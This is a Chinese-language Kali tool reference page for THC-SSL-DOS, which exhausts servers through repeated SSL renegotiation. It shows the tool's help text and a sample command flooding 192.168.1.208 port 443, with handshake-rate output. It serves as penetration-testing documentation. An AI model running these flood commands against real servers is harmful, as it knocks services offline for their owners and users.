<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>kali工具箱</title>
<script src="./static/bootstrap.min.js"></script>
<link rel="stylesheet" href="./static/main.css">
<link rel="stylesheet" href="./static/bootstrap.min.css">
<style type="text/css" id="syntaxhighlighteranchor"></style>
</head>
<main class="main-container ng-scope" ng-view="">
<div class="main receptacle post-view ng-scope">
<article class="entry ng-scope" ng-controller="EntryCtrl" ui-lightbox="">
<section class="entry-content ng-binding" ng-bind-html="postContentTrustedHtml">
<h2> THC-SSL-DOS包装说明</h2><p style="text-align: justify;"> THC-SSL-DOS是一个工具来验证SSL的性能。建立一个安全的SSL连接需要的服务器，而不是在客户端上15倍的处理能力。 THC-SSL-DOS利用这种不对称性通过重载服务器和敲它关闭互联网。此问题会影响所有的SSL实现的今天。这些厂商都意识到这个问题，自2003年以来该问题被广泛讨论。这种攻击进一步利用了SSL安全的重新协商功能，通过单一的TCP连接触发数以千计的重新协商。 </p><p>资料来源：https://www.thc.org/thc-ssl-dos/ <br> <a href="http://www.thc.org/thc-ssl-dos/" variation="deepblue" target="blank">THC-SSL-DOS首页</a> | <a href="http://git.kali.org/gitweb/?p=packages/thc-ssl-dos.git;a=summary" variation="deepblue" target="blank">卡利THC-SSL-DOS回购</a> </p><ul><li>作者：黑客选择</li><li>许可：GPL第二版</li></ul><h3>包含在THC-SSL-DOS软件包工具</h3><h5> THC-SSL-DOS - 压力测试仪，用于SSL握手</h5><code><a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="e795888893a78c868b8e">[email&#160;protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>:~# thc-ssl-dos -h<br>
     ______________ ___  _________<br>
     \__    ___/   |   \ \_   ___ \<br>
       |    | /    ~    \/    \  \/<br>
       |    | \    Y    /\     \____<br>
       |____|  \___|_  /  \______  /<br>
                     \/          \/<br>
            http://www.thc.org<br>
<br>
          Twitter @hackerschoice<br>
<br>
Greetingz: the french underground<br>
<br>
./thc-ssl-dos [options] &lt;ip&gt; &lt;port&gt;<br>
  -h      help<br>
  -l &lt;n&gt;  Limit parallel connections [default: 400]</code><h3> THC-SSL-DOS用法示例</h3><p>使用100个连接<b><i>（-L 100），</i></b>防洪目标<b><i>IP（192.168.1.208）</i></b>和端口<b><i>（443）：</i></b> </p><code><a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="a0d2cfcfd4e0cbc1ccc9">[email&#160;protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>:~# thc-ssl-dos -l 100 192.168.1.208 443 --accept<br>
     ______________ ___  _________<br>
     \__    ___/   |   \ \_   ___ \<br>
       |    | /    ~    \/    \  \/<br>
       |    | \    Y    /\     \____<br>
       |____|  \___|_  /  \______  /<br>
                     \/          \/<br>
            http://www.thc.org<br>
<br>
          Twitter @hackerschoice<br>
<br>
Greetingz: the french underground<br>
<br>
Waiting for script kiddies to piss off................<br>
The force is with those who read the source...<br>
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err<br>
Handshakes 2 [2.90 h/s], 6 Conn, 0 Err<br>
Handshakes 25 [22.42 h/s], 13 Conn, 0 Err<br>
Handshakes 70 [43.97 h/s], 20 Conn, 0 Err<br>
Handshakes 125 [56.51 h/s], 27 Conn, 0 Err<br>
Handshakes 185 [62.09 h/s], 33 Conn, 0 Err<br>
Handshakes 262 [74.56 h/s], 41 Conn, 0 Err<br>
Handshakes 365 [104.93 h/s], 47 Conn, 0 Err<br>
Handshakes 496 [131.23 h/s], 54 Conn, 0 Err</code><div style="display:none">
<script src="//s11.cnzz.com/z_stat.php?id=1260038378&web_id=1260038378" language="JavaScript"></script>
</div>
</main></body></html>
